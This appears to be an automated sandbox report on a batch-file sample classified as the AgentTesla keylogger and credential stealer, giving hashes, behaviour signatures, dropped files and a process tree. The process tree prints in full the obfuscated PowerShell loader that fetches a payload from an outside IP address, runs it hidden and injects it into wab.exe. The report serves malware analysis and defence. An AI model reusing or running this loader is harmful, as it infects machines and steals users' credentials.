Overview

overview

10

Static

static

1

aa42e8496c...bf.bat

windows7-x64

10

aa42e8496c...bf.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    25-04-2024 16:38

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    aa42e8496ced596dfc972f148bb41a5f31e344921c875ce83a4e449dcf3974bf.bat

  • Size

    7KB

  • MD5

    9eb9ec107cbbbb33b41d9df263eb0547

  • SHA1

    9f4098053112c864b75d3d22a647a63fbcb00db5

  • SHA256

    aa42e8496ced596dfc972f148bb41a5f31e344921c875ce83a4e449dcf3974bf

  • SHA512

    361706ca0f0af6c28e29c82fa2db3a33cda075f7fa2220a0f32a0e080bd8a2cc424aa77e9ca73667ecd696858ba974d1172e153d7e018e0107fe3c1b18c4c127

  • SSDEEP

    192:KjYxSFV4/jJSi0JJ1e816YEz/QoTE1onTUDaBo3NNTDYGS5n:KjKSF6/jJ3wR6Y8QoTE16I+Bo3NtDTu

Score
10/10
agentteslakeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Blocklisted process makes network request 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\aa42e8496ced596dfc972f148bb41a5f31e344921c875ce83a4e449dcf3974bf.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1288
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "$Conjee = 1;$Sknhedsaabenbaringen='Substrin';$Sknhedsaabenbaringen+='g';Function Indisturbable($Antigenernes){$Stemmeberettigede=$Antigenernes.Length-$Conjee;For($Fodboldspillerens=5; $Fodboldspillerens -lt $Stemmeberettigede; $Fodboldspillerens+=(6)){$Noneviction+=$Antigenernes.$Sknhedsaabenbaringen.Invoke($Fodboldspillerens, $Conjee);}$Noneviction;}function Wharfie($Breddesekundets){.($Funktionssymboler) ($Breddesekundets);}$Gravsten=Indisturbable 'AflbsMBuddyoSpindzSp.ffiDihydl Drp.lUmedgaExtra/Leves5Skibs.Pathe0Konto Gaard(AleurW Untri ,lbinoutjedSporio Alo,w.espesBehav MilliNChromTSmals Unawa1 High0Gluon.Bragg0worst;Progn VoksbW lrei NidknDesti6Ja,ey4Bssel;Forsv Nsk bxPropp6Kibit4 Zygo;Reefi Vagtsr GyrovDiabo:casta1 T,ss2 F,rt1Banta.be.bu0Natur).tora Deli.GCeiboePre ecTidspk PlanoDigte/Praes2Unjoy0Jalou1P cif0Pheno0Vil.t1Irate0Skrav1Upaaa DemolFMil.ii In.rrMisc.e,odlef Krymo UndexS,nta/,ndos1Scrai2Nonco1Breds.s.orm0Ka.fe ';$aktuarerne=Indisturbable 'BjartU usins,laireMargirPalul-me.vrAH ddygGro,neAbsc.n uroptD.awb ';$Modning91=Indisturbable 'Afl dhR.flet Int tPatagp Demo: Oprr/Gener/Nonca2Morti3 C,ns. Blac9Uns a5Corre. Hjem6Deva 0Nonli. Pale7.lcad7hypon/U.mnsD ButiaForsytWagg aPrin,iLandsn.hantdUdradsBus,eaOutpum Rd.llInteriYn lenTh,rdg ammes BestmInspeeG.nnetH,lvtoCrinidMuskeeFrees.F,nesa KullaSlummfLeew ';$Overvurderingen=Indisturbable 'Tamdy>d,gsr ';$Funktionssymboler=Indisturbable 'Farvei PhoteI.orhx B.ch ';$Sammenskudsgildet='spareknivenes';Wharfie (Indisturbable 'GiveySCharie Ydertvrd,f-i dagCGast.oD rthn.andetNdsteeCafe n BurktFunkt In,d-Redn.PInartaTr,nstInco,hDataf RedakTEs im:Glyce\ PredTBrordoKitterRabuldFrmaneAfkrinBef,lsCentrkEthery Tm.el OmtalNew peHymnarKnudensp rre Fort.Sk,altPaalgxM ljvtDoubl Neu.o-UnconVKobleanonrelLandsu PartePerip Snake$IsogaSmatuta AdelmCert.mGlaskeTravenEqui,sAvadak Ans,uBr vidLednisStrafgskandiR.umblSublidCcitteEddistkrepl;Brand ');Wharfie (Indisturbable ' Polii Udvif R is Sibe.(,utint sbeeI.dbus mnintKlang- PrefpAvlstaSids tBerryhBrand PertaTHa.va:Nicam\T phaT AndeoDilkerHjtlydUn ilethw cnBuzzasGavnekTransybeli.lKompllDistreDida.r,onscn .kemebeskr.MiractAuto xUndistSoftw)J.rnb{sceneeBlodbxMoneyiTotr,t Afte}domsf; Fora ');$Kvantumsrabattens = Indisturbable 'BaadeeNedbrcReb bhSapheoBaham Afgha%Run,iaKongepRidsnpMidded daggabuzzatBronka,fsin%Unbar\ CopaWVaadeeDannesDecamtDampnf FarvaPlughlfe.oge arcen utom2Gesti0Ekstr8Can,r.Coun.ULongsnFi romSvmme Saun&Afplu&Misse Skurke.irmacOvervhFolkeo anni Desig$Trian ';Wharfie (Indisturbable ' Lath$Tekstg Gudml T,ffo Uoplb Bal.aSatsalEjend: nrivSH,etooRoc.ecLogikiArbejaRefrilGeddeiDefecsRaaheaNove,tfl.nti Mesmo .fornMe.ocs .uclpNon irAkvaroAff ocsupereOverjsUnbl.sMod leSublarTr.cenDrjeneBesud5Marmo8Viden=Rehab(Fysi.cPelsfmEn.epdZigza Indav/ Hircc Tabl Omski$TelugKAntibv NoncaPrevenPlankt CommuSq,alm AfsisLi.sir floraDipwab Anala Prentfa ritRak.oesarinn HavmsAchro)Catas ');Wharfie (Indisturbable ' Cand$JunglgfragtlSpoero.abagbJocunaCar.olUnde.:DelgrM.ervei TraclRealii Udbut VldeaAgou.nRenhecKobleiBatteedivers V.ld=,seud$uddatMUnepio.acandmunisnOmkriioutman SupegOve e9Impai1Sn,ck.fummls.elibpPeritlBlomkiLensgtNynlu(Tel u$subv,ODorsivtroskeEfterrImprivunderuMimrerArbejd Cleaeemissrho.edi Ch,rn Aflagislame U.denCrat )Di is ');$Modning91=$Militancies[0];Wharfie (Indisturbable 'C.men$Ve,ergUpwhil Prs oHyr.nbVermiaRnssnlMaski: InfiCBlge,oForetnMurics K.lltMissirAmbituT,gdkcAmal tThyreoBenzir TurnsCl.ys= ,pexNSul.heUnp rwPedo -Si.naOTh.rsbPetrijOverceKa apccentrtPa,ri WoolwS,olkeyHenstsCalemtCamase evidm Fis,.U gloN ,ackeOev itWards.SetarW,etroeRokkeb opslCEventlBassiiMesope BedfnTomatt Fal ');Wharfie (Indisturbable 'gno.t$R.staCUlnieoHaftonSpor sMetapt Fronr ExsiuIn lsc VaabtTjeneoAubadrVelgrsSpla..GalhoHoverpeSew naAlungdInde.eforgirHavkassalve[ L de$Ov,rra TankkHypert ReseuAntikaPristr Plure.trafrAntienBatiseLrepr]Ufor.=Andie$EkspeG,ennerOrnitaFa eivSydsis S,elt Ethie iltrnAfske ');$Traprocks=Indisturbable 'T.ilzCHovmooSkarrnBar esBa.lttGaflerEk,teuSt.etc lretDisapoBltesr FremsHelli.RepeaDKrapyoTranew .krinbreakl Maino mik,aReingd KernFProbliUdenrlReva ePre r(Newsp$neutrM BinooFli tdNo senGrufuide.egnTrmlkgPales9Pancr1Overs,H mom$WeirdS.onvekvideor HokuaAl amlsubc,dRadieeSemippPsy hoSeel,sPolsteK,ydsrNonemn,afiaeS,jtesMelan)Dknet ';$Traprocks=$Socialisationsprocesserne58[1]+$Traprocks;$Skraldeposernes=$Socialisationsprocesserne58[0];Wharfie (Indisturbable 'Award$libelgZygoul .sykoUproabHepataObserlSabb.:Ba.llHPervae ,rorlkinesa Udkmu,verstOs.edoLupetm fi,sa langtSulphiOver,s S eteTryinrDeeskiSt.mynEsbergBor,l= bser(unmorT ud aeKommusUnnestEns.a-.ikkePP,denaS,mertPointhRocka Subbi$ Un,aSAntinkUnmetrSkydeaBagsilTusm dRev,te DopipAcceloAte.ssGrsenePort rAfs.enCa.ire HavrsT.rme)Flytt ');while (!$Helautomatisering) {Wharfie (Indisturbable ' irke$Rim,lg Winglper,ioSubmibDiploaGammalShi,a:BrontMSyltnoIronirSam ia.acros MatisS eti=Pr,nt$ FlletFors r GinguVa,laeLenti ') ;Wharfie $Traprocks;Wharfie (Indisturbable 'GammaS Dou tAccesaAgendrDuplitMbler- BagbS ainlVelmae CuskeCorecp.roun Pift4N.utr ');Wharfie (Indisturbable 'Slids$ Oc,rgKmpevlCata oNonoub ffacaBevoglReduc:UndetHBefraeArmb lDishuaAfsk.uBa drtWad,yo arromFanmaa S,intEmigriProsasindureFuldfrCitiziUni,nnGrusvgKnubs=Force(tofteT st,keStrygs GruntUdbet-Fart,P ndavaKvalitFanklhSuper Enmit$stopuSU.fudkSlgtsrNivelaProgrlPolyadPreteeFalanp PlukoReunisHandleAlo.irMistonFolkeeJulensSamli)Efter ') ;Wharfie (Indisturbable 'Versl$VillagUnifolIco oo Verab.efenaAutoml S il:M,iopJExp,rgSkov,eGal.crvkkelsVirketHak,suVastiePacifr,eopon PanteCuptusAnapt=.utch$SoppegFem.nlVil,mo PredbChif,a rtsl Unsu:konvee Bitek A,des TilmtO,ersrAfbreaNarkouSmoldd AbsogVe.teiTatarfOutbltPolypeTil,rrV,rke+E ifi+suppl%Korr $RhesuM SiddiLufthlMagnhiDilattPropiaAmphinReallcDetoniTrolle DiatsHeter.SedancChrysoCigaru Deponalo.etImage ') ;$Modning91=$Militancies[$Jgerstuernes];}Wharfie (Indisturbable 'Kasse$SemiogPl,skltrespo sc.sb.arboatensil Mell:RampaS sterk ikieTutuklgau,leTostitKakifoSweatnPletslRejs,iTankfkBrinteLgtni Muscu=Het.r FaddeGb.joue,elintblods-Ba,taCGavekoSup.rngnavet H,ndeBebeenDow,btMinds D,mo$ConvoSOutgokF,rker undiaSvampl Hjn.dI.praeBestrp Ti doAarlis odeeDemokr,mulsnFalseePs.udsD.met ');Wharfie (Indisturbable ' ored$BeduigPlanol Forro TypebGriska,etodlFests:AarsaOCobwerPrajaa RenonDisplg busleEftersHalme Ja n=Ge er C.unt[,uperSUd rkycentrs zoprtErod,e Ca.pm ena.KringCfour,oHaaksnEkspevEnglieFe,skrLottit Bedr]Mal,a:borge: StedF Bagtr Outjo VandmUdfa.BSkummaExtirsMetate .orm6Obduk4ProgrSOverstLimourPseudiBeliinTune gdri.t(Loosi$Kl.riSdogrik.risieUrteglBrol,eGa antBasheoJulekn Utillafm,li HovekGitepekogle)Udsty ');Wharfie (Indisturbable 'Adact$Statig ProslExtrao.oersbNonpeaefterlSmaat: royaRCen.reGues.tCocknrUnderyFourc Apost=Likew Mesos[Forb SAugieyPa.blsqu,nttKondeePr.ham Redi.,zeotTAgnareBomblxA illtbaalp.Unst.EblinknFerric avenoRealldPengei Mor.nJulesgSo.ia]Raadi: Bear:ThygeA RecaSJenniCCordeIStrafI aywa. TresGIod zeForestBred SVermit ,pumrOestriAchronRaa agItera( Taph$DemobOEuroprDebataillusngazetgNeapoeBlafrsForet)Proje ');Wharfie (Indisturbable 'Signa$.allig DistlNedfloPhotobChloraNongal Kera:,edicFEcclerB.ndsypes,osSpiseeYahvep For,u,eagunDekorkInvintDozinsHumicsskgh nNaz rkClavinudtapiforklnChuffgCe,seeHjtberCr,ss=hamot$KampdRAutooeRd.udtWanrer i,meyElect.Ar.hss G,neu ecarbReleis Eg etphthar ,irci onnnunp.sgScr.g(Knude3Tinst0Lupoi1Canti3Brune9 Watt8 Tard,Herb.2soot 7 aerm5 Elim5 Te e8 Jive) Fige ');Wharfie $Frysepunktssnkninger;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3028
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Westfalen208.Unm && echo $"
        3⤵
          PID:2664
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Conjee = 1;$Sknhedsaabenbaringen='Substrin';$Sknhedsaabenbaringen+='g';Function Indisturbable($Antigenernes){$Stemmeberettigede=$Antigenernes.Length-$Conjee;For($Fodboldspillerens=5; $Fodboldspillerens -lt $Stemmeberettigede; $Fodboldspillerens+=(6)){$Noneviction+=$Antigenernes.$Sknhedsaabenbaringen.Invoke($Fodboldspillerens, $Conjee);}$Noneviction;}function Wharfie($Breddesekundets){.($Funktionssymboler) ($Breddesekundets);}$Gravsten=Indisturbable 'AflbsMBuddyoSpindzSp.ffiDihydl Drp.lUmedgaExtra/Leves5Skibs.Pathe0Konto Gaard(AleurW Untri ,lbinoutjedSporio Alo,w.espesBehav MilliNChromTSmals Unawa1 High0Gluon.Bragg0worst;Progn VoksbW lrei NidknDesti6Ja,ey4Bssel;Forsv Nsk bxPropp6Kibit4 Zygo;Reefi Vagtsr GyrovDiabo:casta1 T,ss2 F,rt1Banta.be.bu0Natur).tora Deli.GCeiboePre ecTidspk PlanoDigte/Praes2Unjoy0Jalou1P cif0Pheno0Vil.t1Irate0Skrav1Upaaa DemolFMil.ii In.rrMisc.e,odlef Krymo UndexS,nta/,ndos1Scrai2Nonco1Breds.s.orm0Ka.fe ';$aktuarerne=Indisturbable 'BjartU usins,laireMargirPalul-me.vrAH ddygGro,neAbsc.n uroptD.awb ';$Modning91=Indisturbable 'Afl dhR.flet Int tPatagp Demo: Oprr/Gener/Nonca2Morti3 C,ns. Blac9Uns a5Corre. Hjem6Deva 0Nonli. Pale7.lcad7hypon/U.mnsD ButiaForsytWagg aPrin,iLandsn.hantdUdradsBus,eaOutpum Rd.llInteriYn lenTh,rdg ammes BestmInspeeG.nnetH,lvtoCrinidMuskeeFrees.F,nesa KullaSlummfLeew ';$Overvurderingen=Indisturbable 'Tamdy>d,gsr ';$Funktionssymboler=Indisturbable 'Farvei PhoteI.orhx B.ch ';$Sammenskudsgildet='spareknivenes';Wharfie (Indisturbable 'GiveySCharie Ydertvrd,f-i dagCGast.oD rthn.andetNdsteeCafe n BurktFunkt In,d-Redn.PInartaTr,nstInco,hDataf RedakTEs im:Glyce\ PredTBrordoKitterRabuldFrmaneAfkrinBef,lsCentrkEthery Tm.el OmtalNew peHymnarKnudensp rre Fort.Sk,altPaalgxM ljvtDoubl Neu.o-UnconVKobleanonrelLandsu PartePerip Snake$IsogaSmatuta AdelmCert.mGlaskeTravenEqui,sAvadak Ans,uBr vidLednisStrafgskandiR.umblSublidCcitteEddistkrepl;Brand ');Wharfie (Indisturbable ' Polii Udvif R is Sibe.(,utint sbeeI.dbus mnintKlang- PrefpAvlstaSids tBerryhBrand PertaTHa.va:Nicam\T phaT AndeoDilkerHjtlydUn ilethw cnBuzzasGavnekTransybeli.lKompllDistreDida.r,onscn .kemebeskr.MiractAuto xUndistSoftw)J.rnb{sceneeBlodbxMoneyiTotr,t Afte}domsf; Fora ');$Kvantumsrabattens = Indisturbable 'BaadeeNedbrcReb bhSapheoBaham Afgha%Run,iaKongepRidsnpMidded daggabuzzatBronka,fsin%Unbar\ CopaWVaadeeDannesDecamtDampnf FarvaPlughlfe.oge arcen utom2Gesti0Ekstr8Can,r.Coun.ULongsnFi romSvmme Saun&Afplu&Misse Skurke.irmacOvervhFolkeo anni Desig$Trian ';Wharfie (Indisturbable ' Lath$Tekstg Gudml T,ffo Uoplb Bal.aSatsalEjend: nrivSH,etooRoc.ecLogikiArbejaRefrilGeddeiDefecsRaaheaNove,tfl.nti Mesmo .fornMe.ocs .uclpNon irAkvaroAff ocsupereOverjsUnbl.sMod leSublarTr.cenDrjeneBesud5Marmo8Viden=Rehab(Fysi.cPelsfmEn.epdZigza Indav/ Hircc Tabl Omski$TelugKAntibv NoncaPrevenPlankt CommuSq,alm AfsisLi.sir floraDipwab Anala Prentfa ritRak.oesarinn HavmsAchro)Catas ');Wharfie (Indisturbable ' Cand$JunglgfragtlSpoero.abagbJocunaCar.olUnde.:DelgrM.ervei TraclRealii Udbut VldeaAgou.nRenhecKobleiBatteedivers V.ld=,seud$uddatMUnepio.acandmunisnOmkriioutman SupegOve e9Impai1Sn,ck.fummls.elibpPeritlBlomkiLensgtNynlu(Tel u$subv,ODorsivtroskeEfterrImprivunderuMimrerArbejd Cleaeemissrho.edi Ch,rn Aflagislame U.denCrat )Di is ');$Modning91=$Militancies[0];Wharfie (Indisturbable 'C.men$Ve,ergUpwhil Prs oHyr.nbVermiaRnssnlMaski: InfiCBlge,oForetnMurics K.lltMissirAmbituT,gdkcAmal tThyreoBenzir TurnsCl.ys= ,pexNSul.heUnp rwPedo -Si.naOTh.rsbPetrijOverceKa apccentrtPa,ri WoolwS,olkeyHenstsCalemtCamase evidm Fis,.U gloN ,ackeOev itWards.SetarW,etroeRokkeb opslCEventlBassiiMesope BedfnTomatt Fal ');Wharfie (Indisturbable 'gno.t$R.staCUlnieoHaftonSpor sMetapt Fronr ExsiuIn lsc VaabtTjeneoAubadrVelgrsSpla..GalhoHoverpeSew naAlungdInde.eforgirHavkassalve[ L de$Ov,rra TankkHypert ReseuAntikaPristr Plure.trafrAntienBatiseLrepr]Ufor.=Andie$EkspeG,ennerOrnitaFa eivSydsis S,elt Ethie iltrnAfske ');$Traprocks=Indisturbable 'T.ilzCHovmooSkarrnBar esBa.lttGaflerEk,teuSt.etc lretDisapoBltesr FremsHelli.RepeaDKrapyoTranew .krinbreakl Maino mik,aReingd KernFProbliUdenrlReva ePre r(Newsp$neutrM BinooFli tdNo senGrufuide.egnTrmlkgPales9Pancr1Overs,H mom$WeirdS.onvekvideor HokuaAl amlsubc,dRadieeSemippPsy hoSeel,sPolsteK,ydsrNonemn,afiaeS,jtesMelan)Dknet ';$Traprocks=$Socialisationsprocesserne58[1]+$Traprocks;$Skraldeposernes=$Socialisationsprocesserne58[0];Wharfie (Indisturbable 'Award$libelgZygoul .sykoUproabHepataObserlSabb.:Ba.llHPervae ,rorlkinesa Udkmu,verstOs.edoLupetm fi,sa langtSulphiOver,s S eteTryinrDeeskiSt.mynEsbergBor,l= bser(unmorT ud aeKommusUnnestEns.a-.ikkePP,denaS,mertPointhRocka Subbi$ Un,aSAntinkUnmetrSkydeaBagsilTusm dRev,te DopipAcceloAte.ssGrsenePort rAfs.enCa.ire HavrsT.rme)Flytt ');while (!$Helautomatisering) {Wharfie (Indisturbable ' irke$Rim,lg Winglper,ioSubmibDiploaGammalShi,a:BrontMSyltnoIronirSam ia.acros MatisS eti=Pr,nt$ FlletFors r GinguVa,laeLenti ') ;Wharfie $Traprocks;Wharfie (Indisturbable 'GammaS Dou tAccesaAgendrDuplitMbler- BagbS ainlVelmae CuskeCorecp.roun Pift4N.utr ');Wharfie (Indisturbable 'Slids$ Oc,rgKmpevlCata oNonoub ffacaBevoglReduc:UndetHBefraeArmb lDishuaAfsk.uBa drtWad,yo arromFanmaa S,intEmigriProsasindureFuldfrCitiziUni,nnGrusvgKnubs=Force(tofteT st,keStrygs GruntUdbet-Fart,P ndavaKvalitFanklhSuper Enmit$stopuSU.fudkSlgtsrNivelaProgrlPolyadPreteeFalanp PlukoReunisHandleAlo.irMistonFolkeeJulensSamli)Efter ') ;Wharfie (Indisturbable 'Versl$VillagUnifolIco oo Verab.efenaAutoml S il:M,iopJExp,rgSkov,eGal.crvkkelsVirketHak,suVastiePacifr,eopon PanteCuptusAnapt=.utch$SoppegFem.nlVil,mo PredbChif,a rtsl Unsu:konvee Bitek A,des TilmtO,ersrAfbreaNarkouSmoldd AbsogVe.teiTatarfOutbltPolypeTil,rrV,rke+E ifi+suppl%Korr $RhesuM SiddiLufthlMagnhiDilattPropiaAmphinReallcDetoniTrolle DiatsHeter.SedancChrysoCigaru Deponalo.etImage ') ;$Modning91=$Militancies[$Jgerstuernes];}Wharfie (Indisturbable 'Kasse$SemiogPl,skltrespo sc.sb.arboatensil Mell:RampaS sterk ikieTutuklgau,leTostitKakifoSweatnPletslRejs,iTankfkBrinteLgtni Muscu=Het.r FaddeGb.joue,elintblods-Ba,taCGavekoSup.rngnavet H,ndeBebeenDow,btMinds D,mo$ConvoSOutgokF,rker undiaSvampl Hjn.dI.praeBestrp Ti doAarlis odeeDemokr,mulsnFalseePs.udsD.met ');Wharfie (Indisturbable ' ored$BeduigPlanol Forro TypebGriska,etodlFests:AarsaOCobwerPrajaa RenonDisplg busleEftersHalme Ja n=Ge er C.unt[,uperSUd rkycentrs zoprtErod,e Ca.pm ena.KringCfour,oHaaksnEkspevEnglieFe,skrLottit Bedr]Mal,a:borge: StedF Bagtr Outjo VandmUdfa.BSkummaExtirsMetate .orm6Obduk4ProgrSOverstLimourPseudiBeliinTune gdri.t(Loosi$Kl.riSdogrik.risieUrteglBrol,eGa antBasheoJulekn Utillafm,li HovekGitepekogle)Udsty ');Wharfie (Indisturbable 'Adact$Statig ProslExtrao.oersbNonpeaefterlSmaat: royaRCen.reGues.tCocknrUnderyFourc Apost=Likew Mesos[Forb SAugieyPa.blsqu,nttKondeePr.ham Redi.,zeotTAgnareBomblxA illtbaalp.Unst.EblinknFerric avenoRealldPengei Mor.nJulesgSo.ia]Raadi: Bear:ThygeA RecaSJenniCCordeIStrafI aywa. TresGIod zeForestBred SVermit ,pumrOestriAchronRaa agItera( Taph$DemobOEuroprDebataillusngazetgNeapoeBlafrsForet)Proje ');Wharfie (Indisturbable 'Signa$.allig DistlNedfloPhotobChloraNongal Kera:,edicFEcclerB.ndsypes,osSpiseeYahvep For,u,eagunDekorkInvintDozinsHumicsskgh nNaz rkClavinudtapiforklnChuffgCe,seeHjtberCr,ss=hamot$KampdRAutooeRd.udtWanrer i,meyElect.Ar.hss G,neu ecarbReleis Eg etphthar ,irci onnnunp.sgScr.g(Knude3Tinst0Lupoi1Canti3Brune9 Watt8 Tard,Herb.2soot 7 aerm5 Elim5 Te e8 Jive) Fige ');Wharfie $Frysepunktssnkninger;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2564
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Westfalen208.Unm && echo $"
            4⤵
              PID:1904
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1852

      Network

      MITRE ATT&CK Matrix

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K08SKX4ZEVKWL6OWKGWT.temp
        Filesize

        7KB

        MD5

        07cd271ed7ce68cd839b4f7560990011

        SHA1

        72c056380e1fd4ee8342b9bf3491534ef708d18e

        SHA256

        e5144f155822cf23e88a398fcc8ce2b8e59a9f58ec118f9d7a6a1e9227352d03

        SHA512

        b28ef8e21fc919b04453aa276729ba889afe82eec1ed8e4dc2ad44659beffe6e9d7b7f8ac1449b499e7e9f8386cacee50eb60e6c43cb5173cf2fb3d5710942ef

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Westfalen208.Unm
        Filesize

        428KB

        MD5

        77733e60a9ec3270f4fdacc26cf3805d

        SHA1

        35c315d79017697b468ad75a278aa119a5e61d18

        SHA256

        b7e4ff4bb3dc96ffc83515a63fe5180b7ca6a5abb102a4dea75555ac05985382

        SHA512

        0dcd1b4c2f25eb54a5f090add29f44cfa2fac775cf0efa4f102e67a3a68ded1a72f1e7ccab2379bd81072711446a989d0af4a7fef6fdba502b72ad50276127d7

        Download Submit
      • memory/1852-49-0x0000000023E30000-0x0000000023E70000-memory.dmp
        Filesize

        256KB

        Download
      • memory/1852-47-0x000000006EBD0000-0x000000006F2BE000-memory.dmp
        Filesize

        6.9MB

        Download
      • memory/1852-44-0x0000000023E30000-0x0000000023E70000-memory.dmp
        Filesize

        256KB

        Download
      • memory/1852-43-0x000000006EBD0000-0x000000006F2BE000-memory.dmp
        Filesize

        6.9MB

        Download
      • memory/1852-41-0x0000000000360000-0x00000000003A2000-memory.dmp
        Filesize

        264KB

        Download
      • memory/1852-40-0x0000000000360000-0x00000000013C2000-memory.dmp
        Filesize

        16.4MB

        Download
      • memory/1852-36-0x0000000000360000-0x00000000013C2000-memory.dmp
        Filesize

        16.4MB

        Download
      • memory/1852-35-0x00000000770D0000-0x00000000771A6000-memory.dmp
        Filesize

        856KB

        Download
      • memory/1852-34-0x0000000077106000-0x0000000077107000-memory.dmp
        Filesize

        4KB

        Download
      • memory/1852-33-0x0000000076EE0000-0x0000000077089000-memory.dmp
        Filesize

        1.7MB

        Download
      • memory/2564-26-0x0000000002BD0000-0x0000000002C10000-memory.dmp
        Filesize

        256KB

        Download
      • memory/2564-31-0x0000000002BD0000-0x0000000002C10000-memory.dmp
        Filesize

        256KB

        Download
      • memory/2564-23-0x0000000002BD0000-0x0000000002C10000-memory.dmp
        Filesize

        256KB

        Download
      • memory/2564-22-0x0000000002BD0000-0x0000000002C10000-memory.dmp
        Filesize

        256KB

        Download
      • memory/2564-24-0x0000000072D80000-0x000000007332B000-memory.dmp
        Filesize

        5.7MB

        Download
      • memory/2564-32-0x00000000770D0000-0x00000000771A6000-memory.dmp
        Filesize

        856KB

        Download
      • memory/2564-21-0x0000000072D80000-0x000000007332B000-memory.dmp
        Filesize

        5.7MB

        Download
      • memory/2564-27-0x00000000056E0000-0x00000000056E1000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2564-28-0x0000000006670000-0x000000000AA2E000-memory.dmp
        Filesize

        67.7MB

        Download
      • memory/2564-30-0x0000000076EE0000-0x0000000077089000-memory.dmp
        Filesize

        1.7MB

        Download
      • memory/2564-29-0x0000000072D80000-0x000000007332B000-memory.dmp
        Filesize

        5.7MB

        Download
      • memory/3028-4-0x000000001B6A0000-0x000000001B982000-memory.dmp
        Filesize

        2.9MB

        Download
      • memory/3028-15-0x0000000002830000-0x00000000028B0000-memory.dmp
        Filesize

        512KB

        Download
      • memory/3028-14-0x0000000002830000-0x00000000028B0000-memory.dmp
        Filesize

        512KB

        Download
      • memory/3028-13-0x0000000002830000-0x00000000028B0000-memory.dmp
        Filesize

        512KB

        Download
      • memory/3028-12-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/3028-11-0x0000000002830000-0x00000000028B0000-memory.dmp
        Filesize

        512KB

        Download
      • memory/3028-10-0x0000000002830000-0x00000000028B0000-memory.dmp
        Filesize

        512KB

        Download
      • memory/3028-9-0x0000000002830000-0x00000000028B0000-memory.dmp
        Filesize

        512KB

        Download
      • memory/3028-42-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/3028-8-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/3028-5-0x00000000021D0000-0x00000000021D8000-memory.dmp
        Filesize

        32KB

        Download
      • memory/3028-7-0x0000000002830000-0x00000000028B0000-memory.dmp
        Filesize

        512KB

        Download
      • memory/3028-6-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp
        Filesize

        9.6MB

        Download